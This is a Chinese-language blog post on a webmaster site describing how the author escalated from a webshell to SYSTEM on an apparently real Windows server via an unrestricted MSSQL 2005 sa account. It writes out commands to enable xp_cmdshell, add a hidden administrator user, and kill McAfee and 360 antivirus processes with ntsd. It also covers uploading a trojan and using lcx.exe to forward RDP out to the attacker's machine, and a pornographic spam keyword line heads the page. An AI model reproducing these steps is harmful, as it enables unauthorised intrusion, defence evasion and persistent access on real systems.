亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

MSSQL 2005 入侵提權過程分享

2022-9-27 08:29| 查看: 2296 |來源: 互聯網

前言:本文主要以SQL 2005提權為主,講述過程種發現的一些問題和成功經驗。至少拿到shell的過程不在細說。 前期 在拿到一個webshell 后對提權進行分析如下。 1、serv-u 6.4.0.2、mssql sa密碼權限3、sogou拼音輸

前言:本文主要以SQL 2005提權為主,講述過程種發現的一些問題和成功經驗。至少拿到shell的過程不在細說。

前期

在拿到一個webshell 后對提權進行分析如下。

1、serv-u 6.4.0.
2、mssql sa密碼權限
3、sogou拼音輸入

觀察完畢后發現這個服務器的安全性還真不是一般的差,serv-u 目錄可寫。sogu目錄可寫。MSSQL sa 權限無降權。

第一,先用馬把sogou 目錄下的pingup.exe替換了。準備等些時間再來上線呢,可是服務器安裝了mcafee。過不了它。

第二,再探serv-u,使用大馬自帶的serv-u 提權程序先執行下。發現添加用戶。。原因不明,可能是因為降權。。。

第三、開始入手MSSQL,sa權限很好辦。先來開啟xp_cmdshell,SQL2005默認禁用了xp_cmdshell。

1、使用shell下的SQL提權檢測sql組件存在。如圖

2、先使用xp_cmdshell,net user檢測下可用否?執行net user,無果。

3、開啟xp_cmdshell之前要先打開高級配置 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;出現對象關閉時,不允許操作"。

4、開啟xp_cmdshell 

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 出現對象關閉時,不允許操作"。

t00ls大牛們說,是不是被降權了?

5、因為SQL不允許,接下來換aspxspy連接數據庫。

再次執行 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--     6、查看權限,成功返回system。如圖

 

這才明白原來是aspspy功能方面的問題。細節絕對成敗!

中期

7、添加用戶
Exec master.dbo.xp_cmdshell 'net user admins udb311 /add'
如圖

 

密碼不滿足策略要求,要復雜些的。
再來Exec master.dbo.xp_cmdshell 'net user admins udb311!@# /add'

 

7、添加到administratos組
Exec master.dbo.xp_cmdshell 'net localgroup administrators admins /add'

8、遠程桌面服務打開著,ipconfig /all發現是內網,沒有映射3389。

9、上傳lcx.exe 轉發之。發現執行后無反應。

10、換個遠控木馬執行。發現執行后也無反應。

11、tasklist /svc 查看服務。mcafee的進程ID分別是1760 1804 1876 3844 4824。

12、ntsd -c q -p 1760 先干掉一個,然后一個個全干了。

13、重新執行木馬和lcx.exe 仍然無反應。

14、無耐之下,再看下進程tasklist /svc
ntsd -c q -p 920
ntsd -c q -p 7192

干掉360

再觀察下執行木馬發現文件大小為0了,肯定還是被殺。原來mcafee殺木馬不是把它給請出去,而是隔離。唉!

沒有突破mcafee的防線。。。

進階

16、過了一會后,換一個號稱最新的免殺lcx.exe 上傳后,開始再次執行轉發。

結果如下。

 

慢慢的有進度了,很緩慢。

17、查看下端口連接,是否有lcx轉發出來的。netstat -ano

如圖

 

有一條51到我的IP了。。。成功了

18、接下來在路由器做好本機的51端口映射,本機運行lcx.exe -listen 51 3389 監聽有數據返回,拿另外一臺虛擬機來連接。如圖

 

19、杯具啊,原來還是個DC。

 

總結:針對SQL 2005提權難度就沒有增加,而以往的SQL2000主要是在恢復xp_cmdshell上。MSSQL 2005反而更加簡單些。最后提醒廣大的管理員朋友,請重視您的sa權限與密碼。對于本文有任何疑點歡迎前來討論。內網滲透遇到的問題與難點就是端口轉發和映射。另外還要考慮的是服務器上的殺毒軟件。

本文最后更新于 2022-9-27 08:29,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部